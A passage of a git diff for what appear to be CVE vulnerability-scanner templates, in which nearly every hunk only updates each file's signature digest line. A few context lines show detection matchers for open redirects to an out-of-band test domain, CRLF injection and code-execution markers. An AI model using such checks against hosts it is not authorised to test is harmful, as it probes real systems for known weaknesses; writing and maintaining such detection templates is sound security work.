490a00463044022021c6448062ef059db5ea10454e9e55dd92a9117357dfb9b76b7bbe0842b5092402201e66972cf86e8012b22c637acecaae205e71388f3505e43e39efdd3de79d2655:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220290762bcec2beed2199cb1c76946cae39d8e7c30ed600299a74164da6ef2213302201cea66d51bba3fc6d2ab476107c10e675491eff401ab6c07f160e01fd236b216:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3799.yaml b/http/cves/2019/CVE-2019-3799.yaml index 6ad85ae4f0..02eab793da 100644 --- a/http/cves/2019/CVE-2019-3799.yaml +++ b/http/cves/2019/CVE-2019-3799.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210080958d27e9c319a8f826bc8633ae8dea6b7830aa6cfb161eb2e0f4f1d01c0ab3022100b1bfd54be5886f78aa773d769ca01fcd40f0a29602a0d50ab827e808e2eee8f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100884d5122af099bd55156669a663c8c00a457bb10e509802352655c7a53d6879e022100c0feba0e79bef233214a18c02f7fbb22b99df293f84784823f274a9f97888482:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3911.yaml b/http/cves/2019/CVE-2019-3911.yaml index ed32bcca3a..3dc28e9443 100644 --- a/http/cves/2019/CVE-2019-3911.yaml +++ b/http/cves/2019/CVE-2019-3911.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b986602e44e57d8dd80c107ede7843f1cf0bb5790402f300905465fe2166ec9f022067793b03e1155326998b4f5f27ea33968571672da4690ab1a1238b9435488da4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022011a4d3bb95c8b49735554bd5b28dccc1e9340ed8a46c2ae71f0bf6a03d4c4ab502201ebe9ab9c493dcce7b5f2b7f4c7026a979acc5709619e1f76d68973154487006:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3912.yaml b/http/cves/2019/CVE-2019-3912.yaml index ea223038cf..6e948b58a5 100644 --- a/http/cves/2019/CVE-2019-3912.yaml +++ b/http/cves/2019/CVE-2019-3912.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502202facf9c390592bc28c4dac04cc1ee7e777ee2b9f47a1a52f34c28c22ea5dcc44022100eefac30fb0357569c6e6b9aedc343ad494f6fcad92bc166f018d57794331bcc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206f07af3840286d9ccfe1b34ac6cd8a954010061efd3a318285138333eefcd0d2022100ed311673dbdfded599a378c849d3ade38c2ebf05a18105d53a3819e14b738844:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3929.yaml b/http/cves/2019/CVE-2019-3929.yaml index fa607c0894..40e5082092 100644 --- a/http/cves/2019/CVE-2019-3929.yaml +++ b/http/cves/2019/CVE-2019-3929.yaml @@ -45,4 +45,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a00483046022100ccf45a30a0949e13352f9d8ccdecc245788d81fb5259b4479bc77e72e299013e022100e328fe52a893db43831f32097147a4b8dcd0320227934352060fb707689d7d47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022074632ab5f2a59cca98e6284bb1dd461c9d89bfbd5717e20f50733c4957b65a6a0221008db0aa0589332b13150c47886b51460d3ba6afa7cdfe8c497f56f5282ef779a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-5127.yaml b/http/cves/2019/CVE-2019-5127.yaml index 3b2a4fb1e7..6b6ca523b7 100644 --- a/http/cves/2019/CVE-2019-5127.yaml +++ b/http/cves/2019/CVE-2019-5127.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206977a07953de010eddc2f06540e26386a2cf9ffb8840ba8598e45987d322863102202260d28f065e94df6bc8b6cdd7fa32ab97362e01a9448c8582bbf065add3d512:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207d3a098aa02e7c4945fd4f1588f1cf69a818ced0b8e9ba7058d677b96e911cbb02207e45cd2d1ce11cf167188d7c224ee6a24a3c8d2f5840dd3aea078d29c7883ac8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-5418.yaml b/http/cves/2019/CVE-2019-5418.yaml index b2cc82e5b9..fab810610f 100644 --- a/http/cves/2019/CVE-2019-5418.yaml +++ b/http/cves/2019/CVE-2019-5418.yaml @@ -49,4 +49,4 @@ http: status: - 200 - 500 -# digest: 4b0a00483046022100bb39db17c9c867c92d33f72fef56c67fa497d1e89c9dc71cde277df972174e9a022100f02cd6356c87d7d584aff94fdb763c948d072ec3cb74da6571c1128d00a5330e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ef5c0fc32514296a1dc215d972a363458e1937dc3fed05fd4667a2a16319352d02207ee12a32e33866524e628d73e631350bca92a1b9e029d8b50d6b19ff3c1e5d29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-5434.yaml b/http/cves/2019/CVE-2019-5434.yaml index df24f87f58..07618f185d 100644 --- a/http/cves/2019/CVE-2019-5434.yaml +++ b/http/cves/2019/CVE-2019-5434.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d063d3e6f828763a627b1c547a29398d9d3271ba2577e671a648cfa9ffea26dd02207154351fd5498fdfc5b7bf9595690e8824b334442ccf2bbc53f4137aa14e6971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c9c626ee5ef3923b221db82797355e601043d7433b1e3a8c7546f491bba9467002202f3194e5e78a7a77330d5db335bf625f737ef2b5f2de7dd693d7f89a015327e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-6112.yaml b/http/cves/2019/CVE-2019-6112.yaml index 88c9839a3b..cee6cf394f 100644 --- a/http/cves/2019/CVE-2019-6112.yaml +++ b/http/cves/2019/CVE-2019-6112.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204148335bd8f11801e7fbb2b94520c575443b57bf16aab575e9289a3dc771171a02201ecff3a217ab2b208717b766429d14241928ac31f73cabf9641a20673314d2b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100afb58d1b7cf580535dfd6f4e76129f3d692b093a0d7b3122f04e4b39bab5af1a0220305814c2f5ae5e13c834c0d4bb8c18ce2c35f5e9ad8d7dbed344f075fd675044:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-6340.yaml b/http/cves/2019/CVE-2019-6340.yaml index 7c78ae9895..a7cc02aafa 100644 --- a/http/cves/2019/CVE-2019-6340.yaml +++ b/http/cves/2019/CVE-2019-6340.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022036c14e9189a5d60f50772214bceb4a4a1bf4ca0f163bfb662e946c44b7eb5bd2022100a7d27b79d8be353543a2619258a0176f69bcb4d773b3aefca551a12cfc0ac787:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210099018f60b7746aa94f9e477510550ea78ad035347077dd9c02426f905c19888802202522ac15b9cfa70c5726edf93432fad537d8e32c1dd38f4e2acd34e71ff0e1f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-6715.yaml b/http/cves/2019/CVE-2019-6715.yaml index 69c29fdb54..893c2b9ebe 100644 --- a/http/cves/2019/CVE-2019-6715.yaml +++ b/http/cves/2019/CVE-2019-6715.yaml @@ -44,4 +44,4 @@ http: part: body words: - TmVzc3VzQ29kZUV4ZWNUZXN0 -# digest: 490a0046304402204f677dd8171607dac73d10045685d86930d800ddebe89e71c05dffa63994e07902203db4edb61d9901deb17ddf18cf5f165c93cac2014132dd2c19a8eeda939d982f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100988dabbe8f13200fc9059e871dabc13d87299ad78c355c74bc548875b67d65ab02205349110bdb55f168b07fc27b444459bf9abf2a86b35d618b36619ed4bea4534c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-6799.yaml b/http/cves/2019/CVE-2019-6799.yaml index 923762042a..bac3031a9f 100644 --- a/http/cves/2019/CVE-2019-6799.yaml +++ b/http/cves/2019/CVE-2019-6799.yaml @@ -104,4 +104,4 @@ http: - "X-Powered-By: PHP/([0-9.]+)" internal: true part: header -# digest: 4a0a00473045022100f236d158d8c90c01829fc76b9cf88685ed1b1987354c5f52f456093e540f12a402200d0ba2a6199fd82fb2d4dbbf0d7ec82fab8b799702f0fc891d340211793ac723:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f198d780023209330e131fc491747fd84b51b10da5886314e58c8db1d0a2903702202f4e181e8e32d0f890f657bcd09fa725ac064a5b4af0324e9f90cad16054861c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-6802.yaml b/http/cves/2019/CVE-2019-6802.yaml index 5530d65be2..3af501e32f 100644 --- a/http/cves/2019/CVE-2019-6802.yaml +++ b/http/cves/2019/CVE-2019-6802.yaml @@ -41,4 +41,4 @@ http: part: header regex: - "^Set-Cookie: crlfinjection=1;" -# digest: 4b0a00483046022100b16ea55a337e17fdeb0193ad059d9f3556559826d3d9b7110ec51f9e15d266d4022100ee15738e338dcc606c28c92349ff94f11a276dee860966f3e460c235495bda74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ef8a6d78cf7c93ec19c282d4e54d277c229b0aca051259648dfc32720c77c6de022073e99112fe73e6b0772db17d7f8ef694ca4f348c6a22884dfa73277b1f338ac1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml index 317c6cbaa6..2902504a75 100644 --- a/http/cves/2019/CVE-2019-7192.yaml +++ b/http/cves/2019/CVE-2019-7192.yaml @@ -86,4 +86,4 @@ http: regex: - encodeURIComponent\('([A-Za-z0-9]+)'\) internal: true -# digest: 490a00463044022038d4a2748704935b1e8bc5116823f31085bcbf7ea7e50794a573a764ae591c9302205bad9bbdd999c6e5f0f33dd0b4fe2e294705d0497bec580f6ecbad2993041d87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e809e4edb98c43fcda4a8f03819bc69d23cc0335c63bce73175aa1d9bcbdaa9e022100d223c39ee719f6f76378454e15ce6d9c4ed3dfd429c7eaec2a861ed768dfcfc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7219.yaml b/http/cves/2019/CVE-2019-7219.yaml index ae5c95c0c9..e556f453bb 100644 --- a/http/cves/2019/CVE-2019-7219.yaml +++ b/http/cves/2019/CVE-2019-7219.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201f9c792bd42a0769739f929b4c38b124dac897f0127f5e20f70bfcc09b90c10902201ff8d2f3589ed948bac03c7f68742755a21c26a6d6afe08678407f958a4795ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205f2109ba0c2ffb24f189cfed491529da995393ba4558d306ffa5f2f71283891a022100d4766958907c84cd56b11ef49f58c44f0eff392dcc9ed9ca62ff9f6348e1d776:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7238.yaml b/http/cves/2019/CVE-2019-7238.yaml index 028a16d634..b705463d94 100644 --- a/http/cves/2019/CVE-2019-7238.yaml +++ b/http/cves/2019/CVE-2019-7238.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203c9b34ab01cb5b93c5c9eb4d53ed7ccd3e2788b823b5045b92997308e8c3b2de02210094fa054002b0b9d13c5c39142ba8a7d067ae042a99f945ce5a763243c0b3228a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008b4020843a1723e1877c66c9c167bf576895be4d75735e939166d2a0b86e21d4022062047ac09a79ddd7eb24bbf0a27e3cb06aab07c6fca1c1c7187a3cab91bace40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml index e7f6e08a9f..3d394e5c25 100644 --- a/http/cves/2019/CVE-2019-7254.yaml +++ b/http/cves/2019/CVE-2019-7254.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bb316359192a2e97f1b9e2591e40f644b903975677635775eb5f214b2f6985c0022100d7c4e2e1d2890111c501e357d51ecacce20d48c292c20ba130f8c2b25b7d5d38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e031e7ea49fd89dc438d2ca32663643fdd1db714cbd2479dc7fd54624e7d36140220353a7163baca0d2ffed244a93d15fdd2ae7319ec565a0d0f24176c85f61c5580:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7255.yaml b/http/cves/2019/CVE-2019-7255.yaml index a1978abcfa..0acc08a350 100644 --- a/http/cves/2019/CVE-2019-7255.yaml +++ b/http/cves/2019/CVE-2019-7255.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d2ca585bfa1e478670a139dba643afbc320c5036cd04ad9a0b7bb8ed9eee267f02210089d1ea3ca08cf877349adc37c199ddd68e4b7191d459e3411637dc7dfab55fd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ba80d72aceccb03e333f0ed9fb4a02d39d56c68f6444986d9d27ebbaf8e4965c02206292d01987026d4e589546c0b715877dc1700eec847b2338c5025229834a1469:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7256.yaml b/http/cves/2019/CVE-2019-7256.yaml index 7c4bc35199..209a9925ea 100644 --- a/http/cves/2019/CVE-2019-7256.yaml +++ b/http/cves/2019/CVE-2019-7256.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b77a0864213b4fe4125f15f85ed5ed145ca4582c1d9f4dca5187290ea38c1bd3022100a85946a5da75421334d5fcaa5c821f33cdec52d34ea8b20f2d1bb7e8e0e70696:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201601e4fad8e2b48d46f967966a9ab8fa5e458af4c571199d9075862f80a7301a02206c03298347b6c926221c3b151a97daf1c0cb0fa1476a52b42a7ceb9093b8c411:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7315.yaml b/http/cves/2019/CVE-2019-7315.yaml index 77d5d5b8ca..fc90f72d9e 100644 --- a/http/cves/2019/CVE-2019-7315.yaml +++ b/http/cves/2019/CVE-2019-7315.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022056f1e31a5e091e34f6cd5fed41608e0b77b7fa9e64fd560c2b0a8fad231d3f57022100dcc7c5731a1d90478601c9e4e2c93a873d04f640d036189f295aa48028dbc5df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022012367e14d5dcca835fac4958e7c4357e225698064d660be1768b9ff8dcc90f46022061bc2d92f1e092ba7c3e9a999bfa20f0620806b934b86370ad404b6fa5f37fb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7609.yaml b/http/cves/2019/CVE-2019-7609.yaml index 4ab0d87e0c..0ba35427df 100644 --- a/http/cves/2019/CVE-2019-7609.yaml +++ b/http/cves/2019/CVE-2019-7609.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bc111192ff13adf674babda4414e0d0799303f4ab2707307aea0f41ad0622ba80220638387ac9a037be3d80d1f4940b90239e5d302afc0510b26d7225784a1d2e867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207d9e0e230082fe2300413366986b191ccbeccc808f77d1c24f05dc55556a2f7d022100d86640acd6f997183b490fc9a913b33fe9fe65725e2364dc313990e6cb30b00c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8086.yaml b/http/cves/2019/CVE-2019-8086.yaml index 792103fc01..0b06e29b23 100644 --- a/http/cves/2019/CVE-2019-8086.yaml +++ b/http/cves/2019/CVE-2019-8086.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204f4724147e6b4fccd24a3a74c7d5d9ceb47aeacef3d0b7a842540575f9b1963e022100b096a744afe1978dd47f2cfbca79878b90892ee0ff6dacb1fefd99c6b253ddfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c70dafcc7d7d6eb9f99c114648e5761414018b4367b7b4c159da330e35926b27022100ef3ede4e5be782d7c4408ed990ff80d46955910d129b0198e629c7a39b933e53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8390.yaml b/http/cves/2019/CVE-2019-8390.yaml index ccd06cac6c..c4766bdb60 100644 --- a/http/cves/2019/CVE-2019-8390.yaml +++ b/http/cves/2019/CVE-2019-8390.yaml @@ -77,4 +77,4 @@ http: - 'name="login\[_csrf_token\]" value="(.*?)"' internal: true part: body -# digest: 4a0a00473045022100e3a81b15258e85c407afba37c5e98425aecd7660c75135635414559f31097d82022046fc8312c4110e31e2cef362127368744f05d69b7564cffb7f03ef8b604a49cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fc087db4244c0b047911c00cc9fb5db15ae8cb82bf20bcb1a1cdf041f95e033802202a2995b1aa3230d1e5e50e1e13d8d2ebdeaa6bf6b3c594e11f226fe00af16103:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8442.yaml b/http/cves/2019/CVE-2019-8442.yaml index 2d08ccdea3..9bcc15b9df 100644 --- a/http/cves/2019/CVE-2019-8442.yaml +++ b/http/cves/2019/CVE-2019-8442.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e2f32b43a1274af7f685f10486e3a05cabdc34c51a8f155bb01bd5dc1b2c085502201fb5b32334bdee1f088a1a80e3c119b4d8c02ea82efeca8bbe968cf9d59b4502:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022030ab1e62a4f1c8caa5e692844444ead196307e42fd3e2e9f0e1eb502875461520220182f107db03695856a6388ac5f209d313dc8deea153c847aa68fd1e921b37bf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8446.yaml b/http/cves/2019/CVE-2019-8446.yaml index 879faef983..1d800d541b 100644 --- a/http/cves/2019/CVE-2019-8446.yaml +++ b/http/cves/2019/CVE-2019-8446.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204193059c6d37e2bcfcee79be9ac734f32f43ad99d44a03f3b04086fe98ecc423022055242cae42df9b1b7cddd32cf8e362c3b7cd83e6c86b6caafa6bdd2419afe187:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cf8c8942f083be4875c7bbade9267ac54350324c7bfd1748aed4ad932b2bc2cd022100e3f56f7eb8cbb5403eec108fafa3bbf6565d45761fa7aa7142b70e2145a10f90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8449.yaml b/http/cves/2019/CVE-2019-8449.yaml index b1ab518e46..29957e0fce 100644 --- a/http/cves/2019/CVE-2019-8449.yaml +++ b/http/cves/2019/CVE-2019-8449.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210082927165c3433538e7e7e12142538fcb7d141e7efe13d28f113dbe13d38adfe30220089fa38f74ef4ca0327baf9cb0487dc9990adacbddb2fa5445c29d95067318bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210090b0c9255ed4bd8debc3b78c1174da3d676440ab3b22bbcdb4194d73a494e5af022100e25fd700f360d373bc52a570d4443d67fab5096cdf8954cd830bdc143637a36a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8937.yaml b/http/cves/2019/CVE-2019-8937.yaml index e06564bff8..3318dce24d 100644 --- a/http/cves/2019/CVE-2019-8937.yaml +++ b/http/cves/2019/CVE-2019-8937.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022078f305b9f8b44979daece17792ccaedab9d82d42e567e512843777f97de6999802202ed2117d2b35db6fb159719087c57e497e98fd2872b28111dfeab0b0590463e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202bd3e935c79e99a34c030db69d63651b0c0e7618f9a9fc1fc6f70d6869e1da0c022100c4c8563486961e29e44646e2b2ac28a7baeb2cc11cdaef1dc72c24e72a376cac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8982.yaml b/http/cves/2019/CVE-2019-8982.yaml index 0f039a65c1..04272f6144 100644 --- a/http/cves/2019/CVE-2019-8982.yaml +++ b/http/cves/2019/CVE-2019-8982.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f9ac3029d4404d97aff432c3e0ffa1a4d249936ecc188363eab03cade5a8e338022100b5c1985353a7554572bf061349a934ae25cf128c70bdee4d4ad38891b6ce6e38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c8419bc77859a442fcd8d0612de209ebc80b5675ad34980b28a4d5d8e815926e022100e8ae9bdb070d9549bc1f8a3cf90261d0d0346c3621f06f65b273d9ad0c059f16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9618.yaml b/http/cves/2019/CVE-2019-9618.yaml index 223c527492..7c693fe1bb 100644 --- a/http/cves/2019/CVE-2019-9618.yaml +++ b/http/cves/2019/CVE-2019-9618.yaml @@ -43,4 +43,4 @@ http: status: - 200 - 500 -# digest: 4a0a00473045022100df2dab5a0a5ad4c2858e8e14de63d1862124c2fb8a172f0fafb12f765bb45dfd0220479f4fde67fb6dce5da95e2aa2f41a52424b683c991434f945d16777c9ce71d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202db1bd7b90c38465caa26ad972238b385632c795a77c3fdf2d4750a4844de611022100a68e428d7f23b1b8d70f125e03f59136ed684653054a1948015423e6c00f6f42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9632.yaml b/http/cves/2019/CVE-2019-9632.yaml index cb87c282dd..5414d13aff 100644 --- a/http/cves/2019/CVE-2019-9632.yaml +++ b/http/cves/2019/CVE-2019-9632.yaml @@ -42,4 +42,4 @@ http: - type: word words: - "CDGPermissions" -# digest: 4a0a00473045022100d8f52efc0132d9da0548edb08cd00e082b89df73730965c6be260eac77067f7602206acdc95cdd0603d42b209c3d751933b859ac36aa5f5c2d4491f4d6ae0da93f82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c3a18a3318f70664536a9e7854e0801842104da77cb9d9e51d05151afb9b3a3e02210099ce9dd398cd86776308856981762c06e62b1a25641a9c1916f58095c35cebb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9670.yaml b/http/cves/2019/CVE-2019-9670.yaml index b25322e974..fe0cd4bef2 100644 --- a/http/cves/2019/CVE-2019-9670.yaml +++ b/http/cves/2019/CVE-2019-9670.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 503 -# digest: 4a0a004730450220280dea602ba019db2902e0a9601b770753eb6c2a0beacc8cb5bb87fd94edad0d02210089e287badd1b31cee7dc07e24453632f61bf2601af2c6393161ae92d19bfe9cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022025be650ff348f8a04fb039a3746a1768515ac939f6037360689dce492053fdc902206d96b09b1aa5587fabab8167454b097b851550076ac5ab327cff954743c0882b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9726.yaml b/http/cves/2019/CVE-2019-9726.yaml index 9f933eec9b..f2797a2342 100644 --- a/http/cves/2019/CVE-2019-9726.yaml +++ b/http/cves/2019/CVE-2019-9726.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022031bc43dea7cfc90774685068cd90021151fceba9b4b8f74d240f43ffd9da260f022100e9a810e028752235841a1478091eb49535ca89ffbda302ebfc1b39c013e59fca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100db821fa50dfc0ad43f0f6309e81ca1fc7b68bf91be5df336a4bd5cb43f5d016a022100a54f11f1fba2ba7d81d5d470ccbd8b268bf262312d096d9923b4a8f6b0dca73c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9733.yaml b/http/cves/2019/CVE-2019-9733.yaml index f42e4cec13..c5a5c70c45 100644 --- a/http/cves/2019/CVE-2019-9733.yaml +++ b/http/cves/2019/CVE-2019-9733.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210095928fb03724e9caf38f450d65704f308b1b7935e4838abeb83c0d826f3d0eea022100a55608d8db858c3429a25e01ee5f48000a8c17632627da57de81d6fa241ef911:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eebdf2f23a74fda226a58cca586b03c57c6a0dbe50b6b941f2c0ed90d57b944502202f792f81700313b1ca9bb29eb32f003f34a2bbd801a02c7b2d4310aec0b79c8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9915.yaml b/http/cves/2019/CVE-2019-9915.yaml index 84c0a30781..c773ab19c3 100644 --- a/http/cves/2019/CVE-2019-9915.yaml +++ b/http/cves/2019/CVE-2019-9915.yaml @@ -44,4 +44,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1 -# digest: 4a0a004730450221008788f058ad8bc9a4545396c8291ff2999c00d4060b07149c5cfb9cb2dd2ee71f02205a522fb23c5ab963f1f7138b1716c62a485fb4af6f4868e1792761b108572d83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207f236e8f30a6789a8641a2c1d8473b0dd3e9760078d58fe28f1306e332259a30022022c9aa3013a423f01cae3b76a991cf782274821a5681a7e9892d2570574b2b47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9922.yaml b/http/cves/2019/CVE-2019-9922.yaml index b3d1c3c9c4..f244123dc4 100644 --- a/http/cves/2019/CVE-2019-9922.yaml +++ b/http/cves/2019/CVE-2019-9922.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022025eb2b749f69315baa135f24019ef15db3c396a62f1595cbb6af53dc14d7aae8022100cde31cfbe066dad7ce440cdc4f4ee06dc3da7c57a7185cf726aaf72c7d6149a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022075f5b1b3927e8f7aedebc28364088cba1ee336b21ad819a295e55d634da59e2802203b60c8b3df80319ca3c99fe15b89adf399eff4b6a2fda7c94890a3ac67b454c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-0618.yaml b/http/cves/2020/CVE-2020-0618.yaml index e9902ace9e..f4f56d6f5a 100644 --- a/http/cves/2020/CVE-2020-0618.yaml +++ b/http/cves/2020/CVE-2020-0618.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207796ce5eaeb19be44756799ab9d240f55cdec21a63358cf9caa45d531049dae8022100f4079b7480e397faab25a83a473d2ce4982b3ca232f2099abc0fd57970acc66e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009de706dab6bf4aa237f7890db3757b317d854708ae192e463dfb326235693e4102207d1dc79160acb0361cfb0219ae8c54227d3de7ffed60c60c9d6153d4556ec127:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10199.yaml b/http/cves/2020/CVE-2020-10199.yaml index 65fe35feee..b185e39886 100644 --- a/http/cves/2020/CVE-2020-10199.yaml +++ b/http/cves/2020/CVE-2020-10199.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 400 -# digest: 